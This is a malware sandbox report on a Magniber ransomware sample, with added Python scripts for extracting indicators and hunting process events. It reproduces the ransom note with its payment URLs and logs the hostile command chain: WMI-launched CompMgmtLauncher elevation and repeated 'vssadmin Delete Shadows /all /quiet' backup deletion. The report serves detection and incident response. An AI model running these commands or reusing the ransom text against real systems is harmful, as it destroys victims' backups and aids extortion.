Analysis

  • max time kernel
    106s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    22-06-2021 15:20

General

  • Target

    10.exe

  • Size

    21KB

  • MD5

    89dec4d6bfe84c184bba66cb88e9e9b1

  • SHA1

    9ef17ae9e70f9ce851a2460028da272d4828e270

  • SHA256

    2852f76a016cf31d51a7d59a77857bee6285f59c95d6bcb8cd83b83640adbb69

  • SHA512

    37f057cf49cc6e2626e6a3881898cff4d1956bfe73770f7bf35c0e2afbcd04f772eed88ea997eda74c402986d7d234f58269efe695a4a25eddfe7ded8e98a4c0

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!
====================================================================================================
Your files are NOT damaged! Your files are modified only. This modification is reversible.
The only 1 way to decrypt your files is to receive the private key and decryption program.
Any attempts to restore your files with the third party software will be fatal for your files!
====================================================================================================
To receive the private key and decryption program follow the instructions below:
1. Download "Tor Browser" from https://www.torproject.org/ and install it.
2. In the "Tor Browser" open your personal page here:
http://20fcec4066784a708aovlamrdt.5s4ixqul2enwxrqv.onion/ovlamrdt
Note! This page is available via "Tor Browser" only.
====================================================================================================
Also you can use temporary addresses on your personal page without using "Tor Browser":
http://20fcec4066784a708aovlamrdt.dayhit.xyz/ovlamrdt
http://20fcec4066784a708aovlamrdt.bestep.cyou/ovlamrdt
http://20fcec4066784a708aovlamrdt.ownhits.space/ovlamrdt
http://20fcec4066784a708aovlamrdt.plughas.casa/ovlamrdt
Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://20fcec4066784a708aovlamrdt.5s4ixqul2enwxrqv.onion/ovlamrdt

http://20fcec4066784a708aovlamrdt.dayhit.xyz/ovlamrdt

http://20fcec4066784a708aovlamrdt.bestep.cyou/ovlamrdt

http://20fcec4066784a708aovlamrdt.ownhits.space/ovlamrdt

http://20fcec4066784a708aovlamrdt.plughas.casa/ovlamrdt
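
The personal-page URLs carry two indicators worth pulling out for hunting: the first DNS label is a per-victim identifier, and the URL path matches the extension appended to encrypted files (.ovlamrdt in the Downloads section). The Python below is an added example, not part of this report or of any Magniber tooling. It parses the ransom-note text quoted above, separates the .onion address from the clearnet mirrors, derives the victim label and extension, and lists the registrable domains to block. Treating the URL path as the file extension is an inference from this single run; the sample file paths are copied from the Downloads section.

```python
import re
from urllib.parse import urlsplit

# Excerpt of the ransom note as extracted in the report above (not constructed).
RANSOM_NOTE = """To receive the private key and decryption program follow the instructions below:
1. Download "Tor Browser" from https://www.torproject.org/ and install it.
2. In the "Tor Browser" open your personal page here:
http://20fcec4066784a708aovlamrdt.5s4ixqul2enwxrqv.onion/ovlamrdt
Note! This page is available via "Tor Browser" only.
Also you can use temporary addresses on your personal page without using "Tor Browser":
http://20fcec4066784a708aovlamrdt.dayhit.xyz/ovlamrdt
http://20fcec4066784a708aovlamrdt.bestep.cyou/ovlamrdt
http://20fcec4066784a708aovlamrdt.ownhits.space/ovlamrdt
http://20fcec4066784a708aovlamrdt.plughas.casa/ovlamrdt
Note! These are temporary addresses! They will be available for a limited amount of time!
"""

URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def extract_urls(note):
    """All URLs in the note, de-duplicated, in order of appearance."""
    return list(dict.fromkeys(URL_RE.findall(note)))


def split_payment_urls(urls):
    """Separate the Tor hidden service from its clearnet mirrors.
    torproject.org is the browser download link, not attacker infrastructure, so it is dropped."""
    onion, clearnet = [], []
    for url in urls:
        host = urlsplit(url).hostname or ""
        if host.endswith("torproject.org"):
            continue
        (onion if host.endswith(".onion") else clearnet).append(url)
    return onion, clearnet


def victim_tag(url):
    """(victim_label, extension) from a personal-page URL.
    Inference from this run: the first DNS label is a per-victim identifier and the
    path equals the extension appended to encrypted files ('ovlamrdt' here)."""
    parts = urlsplit(url)
    label = (parts.hostname or "").split(".")[0]
    return label, parts.path.strip("/")


def consistent_victim_tag(urls):
    """The single (label, extension) pair shared by every payment URL, or None if they disagree."""
    tags = {victim_tag(u) for u in urls}
    return tags.pop() if len(tags) == 1 else None


def hunt_domains(clearnet_urls):
    """Registrable domains behind the mirrors (victim label stripped), for blocking and hunting."""
    return sorted({".".join((urlsplit(u).hostname or "").split(".")[1:]) for u in clearnet_urls})


def encrypted_files(paths, ext):
    """Paths that carry the ransomware extension."""
    suffix = "." + ext.lower()
    return [p for p in paths if p.lower().endswith(suffix)]


# File paths copied from the Downloads section of this report.
SAMPLE_PATHS = [
    r"C:\Users\Admin\Desktop\ConnectCompare.mov.ovlamrdt",
    r"C:\Users\Admin\Desktop\RestoreEdit.xlsb.ovlamrdt",
    r"C:\Users\Admin\Desktop\readme.txt",
    r"C:\Users\Public\readme.txt",
]

if __name__ == "__main__":
    urls = extract_urls(RANSOM_NOTE)
    onion, clearnet = split_payment_urls(urls)
    label, ext = consistent_victim_tag(onion + clearnet)
    print("victim label:", label, "| extension:", ext)
    print("onion:", onion)
    print("block/hunt domains:", hunt_domains(clearnet))
    print("encrypted:", encrypted_files(SAMPLE_PATHS, ext))
```

The victim label is what ties a host to its payment page, so it belongs in the incident record alongside the file hashes; the four clearnet domains are the only indicators that can be blocked at a resolver, since the .onion address is unreachable without Tor.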

Signatures

  • Magniber Ransomware

    Ransomware family, widely seen in Asia, distributed by the Magnitude exploit kit.

  • Process spawned unexpected child process 9 IoCs

    This typically indicates the parent process was compromised via an exploit or macro. In this run the flagged processes (cmd /c CompMgmtLauncher.exe and vssadmin.exe Delete Shadows /all /quiet) were started through wmic process call create, which is why they appear at the top level of the process tree rather than under 10.exe.

  • Deletes shadow copies 2 TTPs

    Ransomware often deletes Volume Shadow Copies and other backups to inhibit system recovery; here vssadmin.exe Delete Shadows /all /quiet is run four times via WMI from CompMgmtLauncher.exe.

  • Modifies extensions of user files 10 IoCs

    Ransomware generally changes the extension on encrypted files; this sample appends .ovlamrdt (see Downloads).

  • Suspicious use of SetThreadContext 3 IoCs
  • Interacts with shadow copies 2 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1244
    • C:\Users\Admin\AppData\Local\Temp\10.exe
      "C:\Users\Admin\AppData\Local\Temp\10.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:748
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1544
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1964
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1468
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:520
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2008
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        PID:524
  • C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1180
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:532
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        PID:1572
  • C:\Windows\system32\taskhost.exe
    "taskhost.exe"
    1⤵
    • Modifies extensions of user files
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1120
    • C:\Windows\system32\notepad.exe
      notepad.exe C:\Users\Public\readme.txt
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:1196
    • C:\Windows\system32\cmd.exe
      cmd /c "start http://20fcec4066784a708aovlamrdt.dayhit.xyz/ovlamrdt^&1^&44027677^&84^&381^&12"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:900
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" http://20fcec4066784a708aovlamrdt.dayhit.xyz/ovlamrdt&1&44027677&84&381&12
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1772
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1772 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2112
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1496
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1596
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2052
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2240
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:2408
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2060
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      PID:2296
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:2516
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2120
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      PID:2268
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2096
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2340
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:2456
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2084
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      PID:2308
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:2644
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:2704
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:2696
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:2720
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:2768
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    PID:2880
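
The tree shows the chain a detection engineer wants to catch: 10.exe writes into Explorer.EXE, Dwm.exe and taskhost.exe (SetThreadContext, WriteProcessMemory), those hosts run cmd.exe with wmic process call create "cmd /c CompMgmtLauncher.exe", and CompMgmtLauncher.exe in turn launches wmic to run vssadmin.exe Delete Shadows /all /quiet. Processes created through WMI are children of WmiPrvSE.exe, which is why cmd /c CompMgmtLauncher.exe and the vssadmin instances sit at the top level here rather than under 10.exe. The Python below is an added example, not from this report or its sandbox. It replays the tree as constructed Sysmon-style process-creation records (PIDs, image paths and command lines copied from above; the WmiPrvSE.exe parent with PID 3000 and the two benign control rows with PIDs 4000 and 4100 are assumptions) and runs five hunting rules over them. The ATT&CK technique IDs in the comments are added here, not taken from the report.

```python
import ntpath
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 / EDR telemetry shape)."""
    pid: int
    ppid: int
    image: str
    cmdline: str

    @property
    def name(self) -> str:
        return ntpath.basename(self.image).lower()


# Constructed telemetry replaying the tree in the report above. PIDs, images and command
# lines are copied from the report. Assumptions: the WmiPrvSE.exe parent (pid 3000), since
# processes started via 'wmic process call create' are children of the WMI provider host
# (which is why the sandbox shows them at top level), and the benign rows 4000 and 4100.
WMIC_LAUNCH = r'cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""'
WMIC_CL = r'C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"'
VSS_VIA_WMIC = r'"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"'
SYS = r"C:\Windows\system32"
EVENTS = [
    ProcEvent(1244, 600, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE"),
    ProcEvent(748, 1244, r"C:\Users\Admin\AppData\Local\Temp\10.exe", r'"C:\Users\Admin\AppData\Local\Temp\10.exe"'),
    ProcEvent(1544, 748, SYS + r"\cmd.exe", WMIC_LAUNCH),
    ProcEvent(1964, 1544, SYS + r"\wbem\WMIC.exe", WMIC_CL),
    ProcEvent(2008, 1244, SYS + r"\cmd.exe", WMIC_LAUNCH),
    ProcEvent(524, 2008, SYS + r"\wbem\WMIC.exe", WMIC_CL),
    ProcEvent(1180, 600, SYS + r"\Dwm.exe", r'"C:\Windows\system32\Dwm.exe"'),
    ProcEvent(532, 1180, SYS + r"\cmd.exe", WMIC_LAUNCH),
    ProcEvent(1572, 532, SYS + r"\wbem\WMIC.exe", WMIC_CL),
    ProcEvent(1120, 600, SYS + r"\taskhost.exe", r'"taskhost.exe"'),
    ProcEvent(1196, 1120, SYS + r"\notepad.exe", r"notepad.exe C:\Users\Public\readme.txt"),
    ProcEvent(900, 1120, SYS + r"\cmd.exe", r'cmd /c "start http://20fcec4066784a708aovlamrdt.dayhit.xyz/ovlamrdt^&1^&44027677^&84^&381^&12"'),
    ProcEvent(3000, 700, SYS + r"\wbem\WmiPrvSE.exe", r"C:\Windows\system32\wbem\wmiprvse.exe"),  # assumed parent
    ProcEvent(2052, 3000, SYS + r"\cmd.exe", r"cmd /c CompMgmtLauncher.exe"),
    ProcEvent(2240, 2052, SYS + r"\CompMgmtLauncher.exe", r"CompMgmtLauncher.exe"),
    ProcEvent(2408, 2240, SYS + r"\wbem\wmic.exe", VSS_VIA_WMIC),
    ProcEvent(2704, 3000, SYS + r"\vssadmin.exe", r"vssadmin.exe Delete Shadows /all /quiet"),
    ProcEvent(2880, 600, SYS + r"\vssvc.exe", r"C:\Windows\system32\vssvc.exe"),
    ProcEvent(4000, 1244, SYS + r"\notepad.exe", r"notepad.exe C:\Users\Admin\notes.txt"),  # benign control
    ProcEvent(4100, 1244, SYS + r"\cmd.exe", r"cmd.exe"),  # benign control: user-opened shell
]

INJECTED_HOSTS = {"dwm.exe", "taskhost.exe"}  # these never spawn shells; explorer.exe does


def ancestry(pid, index):
    """Image names from pid up to the root, for triage context (stops at unknown parents)."""
    chain, seen = [], set()
    while pid in index and pid not in seen:
        seen.add(pid)
        chain.append(index[pid].name)
        pid = index[pid].ppid
    return chain


def detect(events):
    """Run the hunting rules; returns one alert dict per (rule, process) hit."""
    index = {e.pid: e for e in events}
    alerts = []
    for e in events:
        parent = index.get(e.ppid)
        cl = e.cmdline.lower()
        hits = []
        # WMI used as a process launcher (T1047); here it is wmic.exe itself issuing the call.
        if e.name == "wmic.exe" and re.search(r"process\s+call\s+create", cl):
            hits.append("wmic_process_create")
        # Shadow copy deletion (T1490); essentially never legitimate on a workstation.
        if e.name == "vssadmin.exe" and re.search(r"delete\s+shadows", cl):
            hits.append("vssadmin_delete_shadows")
        # CompMgmtLauncher.exe auto-elevates and should only open mmc.exe (assumption about its
        # normal behaviour); any other child points at a UAC bypass (T1548.002).
        if parent and parent.name == "compmgmtlauncher.exe" and e.name != "mmc.exe":
            hits.append("compmgmtlauncher_abnormal_child")
        # cmd.exe from a host 10.exe was seen writing into: dwm/taskhost never spawn shells,
        # explorer does, so explorer is only flagged when the shell goes straight to wmic.
        if e.name == "cmd.exe" and parent and (
            parent.name in INJECTED_HOSTS or (parent.name == "explorer.exe" and "wmic" in cl)
        ):
            hits.append("injected_host_spawns_cmd")
        # Anything WMI launched appears as a child of WmiPrvSE.exe, detached from its real parent.
        if parent and parent.name == "wmiprvse.exe":
            hits.append("wmiprvse_child")
        for rule in hits:
            alerts.append({"rule": rule, "pid": e.pid, "chain": ancestry(e.pid, index)})
    return alerts


def summarize(alerts):
    """Hit count per rule."""
    return dict(Counter(a["rule"] for a in alerts))


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f'{a["rule"]:32} pid={a["pid"]:<5} {" <- ".join(a["chain"])}')
    print(summarize(detect(EVENTS)))
```

The wmiprvse_child rule is what recovers the link the sandbox tree loses: on a real host the WMI-launched cmd.exe and vssadmin.exe have no ancestry back to 10.exe, so correlating them needs either the WMI operational log or the wmic process call create event on the requesting side, which the first rule provides.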


Downloads

                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\FA2WPLKQ.txt

                        MD5

                        56f4130314491e1fa05d0647e91845be

                        SHA1

                        a13d3c98f0c334313fa0f10ca68688d49be6e5e5

                        SHA256

                        ba7dcad6fda080eba4f97bae45dc8a31e16288e8c475d64263ddb0fe4a0e4f03

                        SHA512

                        4acc01aaa9c751e260dc1061ea0a128d7ed8b7337f659c4d169cb4dc24ce297bc120896a485a1ae0d36d96b72f09edb4499b6175845d7deb08b9244368b033f1

                      • C:\Users\Admin\Desktop\ConnectCompare.mov.ovlamrdt

                        MD5

                        237271bc5fb2ca047728db3906a9645f

                        SHA1

                        ccb2241e91a2fc5de84549ff73c58b054edbee86

                        SHA256

                        3c9e57f30a7c4ad46e5919fbba124b98a6496984ca0c9edadb840be8800a9aaf

                        SHA512

                        8abeb0dd796d1fbbb02f096b86d7975a66e65053e2944d3e336dcae3691dfe2adc6514d57023e6832c8d76cf3c54a6b7c76cdfaa0567e5edf895bf0363903192

                      • C:\Users\Admin\Desktop\DismountRestore.dib.ovlamrdt

                        MD5

                        2dc56067250298c1c88278a96bd2013b

                        SHA1

                        a15237f8de8ae0496eefb7aab3de5858a4b96a88

                        SHA256

                        0bf203c7000dd4200f5a05ab1bebc4be6d78e685326c70225fd9889ea3270583

                        SHA512

                        681e3fc6f8bc15e3e1e1e3f9106dab2d639f6aa8ebb41ab71b683496c6293361bde2263c7af3565e43cf5d99dc7b3033394f77a011f83ebd315e2293d04ca176

                      • C:\Users\Admin\Desktop\GetReset.mpeg.ovlamrdt

                        MD5

                        638718488dd58ded81e6565f799b31e4

                        SHA1

                        0d49d264209e757cee55e7434ea74f9a608b4c1e

                        SHA256

                        64d0a1043202a91aa9799461de455d3e4fae3b662e16b2ab48082649ef5a7486

                        SHA512

                        f826f91fe43aee8dca90d75ecb6aab343b167e5b016c750a01d1f246f113b99a1296ae480072fd69cd125d7858b59526e560343eafbac5786c4db6ac929700de

                      • C:\Users\Admin\Desktop\JoinConnect.png.ovlamrdt

                        MD5

                        e60836f34f56f9dec6dc7aad10827c8b

                        SHA1

                        faf1d77c26d781cdc7ac50e4eb2f362df6eb98a7

                        SHA256

                        e4b4277054215fd742109a651694753ae8320cb2ffe2b925a172c729a3b7f8c5

                        SHA512

                        a66953bc92752081f67d5013bcd550e6c53a9a6c9f86fcafa9d6fb22276523c61d667183cb849c99721d06c3dc995c99c8c7bfef7e7c6885b94090055004716c

                      • C:\Users\Admin\Desktop\RemoveHide.wma.ovlamrdt

                        MD5

                        d98db251e4da5b7d6f11825cc20695dd

                        SHA1

                        aaf39f34cf0cf8795ec3202012120f1ca16942c9

                        SHA256

                        cabca5cdba249e0d21488b2069242a92187a0734fe128f78596079f2e4f683a0

                        SHA512

                        e149e206c286b8a6c56fe921bd999fd0214f7f3e1ab83b50c271a953a89d491326c266c446b6895ddb6a2e0e1e5554f05341599652fa3947d1a0956b0e20ced6

                      • C:\Users\Admin\Desktop\RestartConvertTo.dot.ovlamrdt

                        MD5

                        0491cb5ce78a3c5550cb8fe45ff4ec3f

                        SHA1

                        e4b8ad27029101e16a61ee60eccef69d6ccbf3a8

                        SHA256

                        c65e5e0c8ec3b0b1ab7c57fdf1305d452ca13ed9943cce1fc66e2120907b9ffa

                        SHA512

                        9f844b4e7e683fc27b623d605c700afe24fec80a67fcc061512abd45c8a402a0527d5c9e1bd7d3a8fa35dbba1b0a7cc95964557370652a842a197982f019256e

                      • C:\Users\Admin\Desktop\RestoreEdit.xlsb.ovlamrdt

                        MD5

                        2f91bd70db9ae20bb4073a1f62a6007f

                        SHA1

                        c28a3c8fa7ce0b304d4b29e24e0b3a62cc19697b

                        SHA256

                        97701fc5ac9b15eb9eab63f82418b436761ce8f6a4e09ff4faf920be35a0fe84

                        SHA512

                        d4c326b66b23e4cf0e688b246b18763f3e37de03cc3b68389a4a3bd00480313104b134d441bd9a24597e80734fdc0b449fce4a6e8324b59932a6bd3b1b4d2362

                      • C:\Users\Admin\Desktop\RestoreMeasure.odt.ovlamrdt

                        MD5

                        acadf9ff0abb60e346bddceedfc901de

                        SHA1

                        e54b431b5958719cdd378ef21c0472819a2a02ca

                        SHA256

                        62dfeefa7da1a14186ce6ac41de519688ef7b70cfbe94240f44fdc46157fc314

                        SHA512

                        0f41443103d3c6b9e83ea4fd4498bc71f33e7bdd89593a100b77752bb359bfa8c082ce16d2ad7ac56625b8ee291e8fd9fc85329c227d5af12c17de86d3826576

                      • C:\Users\Admin\Desktop\SetSwitch.wma.ovlamrdt

                        MD5

                        ef97da0119fd4a6c76e21e648197e1f9

                        SHA1

                        68e32ea1cbca7bdd75dc5432aa37c75e919da753

                        SHA256

                        76319fa6c81ed86b50e58e8661b5dca58ec801e02caeb204472ed8e1483d002f

                        SHA512

                        95180319aeca3406a53941514fc191edf4c277e7d382daa596e5882ebcb28377fd74d6450d6a5c2642352ef0154249f58a9664cea50da76e970349da7c2214b2

                      • C:\Users\Admin\Desktop\SkipDebug.vb.ovlamrdt

                        MD5

                        e9c7a634791e2b09f1566b2e274411f9

                        SHA1

                        f5082b00252bcc99f1cb8ac1e44f24c68fad0b8d

                        SHA256

                        c902fa4b27f367f1494812afed8c38130ad2106c0f24ba805df593f98461e1c7

                        SHA512

                        f9acea0e9d1f28ae8d113e999492821f8f7091ccd2a5cd4463e05c71580289e973bdcdc55d214f348ed3796c738fbb48aad9d3a5e3cfb78cad33789e0bb91ff6

                      • C:\Users\Admin\Desktop\readme.txt

                        MD5

                        c69c28204e02cc6f40360c62109674a3

                        SHA1

                        029b309ae902f20d5c8ee1e3d1ca6a58ab96c856

                        SHA256

                        df848f49f20a09f5ff0333ddd157f761ea8082f51ae73b0ee110d0de80c5fbf0

                        SHA512

                        ba657f0b93ad1459dd3736a27ac46ae69cdb56729896890669f065d8e25168d236a293ef89ca7080c42717dba983f563fbc5b2aa3fd7ff2fa14cf3fea5d0150b

                      • C:\Users\Public\readme.txt

                        MD5

                        c69c28204e02cc6f40360c62109674a3

                        SHA1

                        029b309ae902f20d5c8ee1e3d1ca6a58ab96c856

                        SHA256

                        df848f49f20a09f5ff0333ddd157f761ea8082f51ae73b0ee110d0de80c5fbf0

                        SHA512

                        ba657f0b93ad1459dd3736a27ac46ae69cdb56729896890669f065d8e25168d236a293ef89ca7080c42717dba983f563fbc5b2aa3fd7ff2fa14cf3fea5d0150b

                      • \??\PIPE\srvsvc

                        MD5

                        d41d8cd98f00b204e9800998ecf8427e

                        SHA1

                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                        SHA256

                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                        SHA512

                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                      • memory/520-150-0x0000000000000000-mapping.dmp

                      • memory/524-151-0x0000000000000000-mapping.dmp

                      • memory/532-141-0x0000000000000000-mapping.dmp

                      • memory/748-92-0x0000000001D00000-0x0000000001D01000-memory.dmp

                        Filesize

                        4KB

                      • memory/748-94-0x0000000001D20000-0x0000000001D21000-memory.dmp

                        Filesize

                        4KB

                      • memory/748-89-0x0000000001CC0000-0x0000000001CC1000-memory.dmp

                        Filesize

                        4KB

                      • memory/748-62-0x0000000000080000-0x0000000000081000-memory.dmp

                        Filesize

                        4KB

                      • memory/748-90-0x0000000001CD0000-0x0000000001CD1000-memory.dmp

                        Filesize

                        4KB

                      • memory/748-61-0x0000000000020000-0x0000000000025000-memory.dmp

                        Filesize

                        20KB

                      • memory/748-93-0x0000000001D10000-0x0000000001D11000-memory.dmp

                        Filesize

                        4KB

                      • memory/748-88-0x0000000001CB0000-0x0000000001CB1000-memory.dmp

                        Filesize

                        4KB

                      • memory/748-65-0x0000000001B40000-0x0000000001B41000-memory.dmp

                        Filesize

                        4KB

                      • memory/748-63-0x0000000000090000-0x0000000000091000-memory.dmp

                        Filesize

                        4KB

                      • memory/748-95-0x0000000001D30000-0x0000000001D31000-memory.dmp

                        Filesize

                        4KB

                      • memory/748-64-0x0000000001B30000-0x0000000001B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/900-139-0x0000000000000000-mapping.dmp

                      • memory/1120-97-0x0000000000220000-0x0000000000224000-memory.dmp

                        Filesize

                        16KB

                      • memory/1196-137-0x000007FEFB561000-0x000007FEFB563000-memory.dmp

                        Filesize

                        8KB

                      • memory/1196-132-0x0000000000000000-mapping.dmp

                      • memory/1244-60-0x0000000002700000-0x0000000002710000-memory.dmp

                        Filesize

                        64KB

                      • memory/1468-147-0x0000000000000000-mapping.dmp

                      • memory/1496-140-0x0000000000000000-mapping.dmp

                      • memory/1544-142-0x0000000000000000-mapping.dmp

                      • memory/1572-144-0x0000000000000000-mapping.dmp

                      • memory/1596-145-0x0000000000000000-mapping.dmp

                      • memory/1772-146-0x0000000000000000-mapping.dmp

                      • memory/1964-148-0x0000000000000000-mapping.dmp

                      • memory/2008-149-0x0000000000000000-mapping.dmp

                      • memory/2112-152-0x0000000000000000-mapping.dmp

                      • memory/2112-153-0x0000000075041000-0x0000000075043000-memory.dmp

                        Filesize

                        8KB

                      • memory/2240-154-0x0000000000000000-mapping.dmp

                      • memory/2268-156-0x0000000000000000-mapping.dmp

                      • memory/2296-158-0x0000000000000000-mapping.dmp

                      • memory/2308-159-0x0000000000000000-mapping.dmp

                      • memory/2340-160-0x0000000000000000-mapping.dmp

                      • memory/2408-164-0x0000000000000000-mapping.dmp

                      • memory/2456-165-0x0000000000000000-mapping.dmp

                      • memory/2516-167-0x0000000000000000-mapping.dmp

                      • memory/2644-168-0x0000000000000000-mapping.dmp